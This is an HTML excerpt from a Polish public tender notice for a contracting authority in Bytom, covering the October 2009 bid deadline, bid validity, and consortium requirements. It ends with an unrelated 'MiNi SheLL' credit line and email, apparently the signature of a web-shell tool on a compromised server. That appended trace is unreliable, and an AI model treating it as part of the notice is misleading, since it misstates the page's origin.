<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> za zaliczeniem pocztowym - dokumenty odpłatne cena siwz - 300PLN.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bpk.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2009 godzina 09:00, miejsce: siedziba zamawiającego , 410902 Bytom pl. T. Kościuszki 11, kancelaria - Biuro Obsługi Klienta.
Otwarcie ofert 
Data: 20/10/2009 godz. 10:00
Miejsce: siedziba zamawiajacego, sala 312.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Forma prawna, jaką musi przyjąć grupa wykonawców, której zostanie udzielone zamówienie: 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. 
Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani  przedstawić Zamawiającemu stosowne porozumienie zawierające w swojej treści następujące postanowienia:
-  oznaczenie celu gospodarczego i czasu trwania umowy obejmującej okres realizacji przedmiotu  zamówienia w tym, 
powiększony o Okres Rękojmi za Wady, 
- określenie lidera (powinien nim być Pełnomocnik wskazany w ofercie Wykonawców ubiegających się wspólnie o udzielenie zamówienia),
- określenie odpowiedzialności solidarnej członków Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia względem Zamawiającego, 
-  określenie zakresu przedmiotu zamówienia, realizowanego przez każdego z Wykonawców,
- wykluczenie możliwości wypowiedzenia umowy Wykonawców ubiegających się wspólnie o udzielenie zamówienia do czasu wykonania zamówienia

Creat By MiNi SheLL
Email: jattceo@gmail.com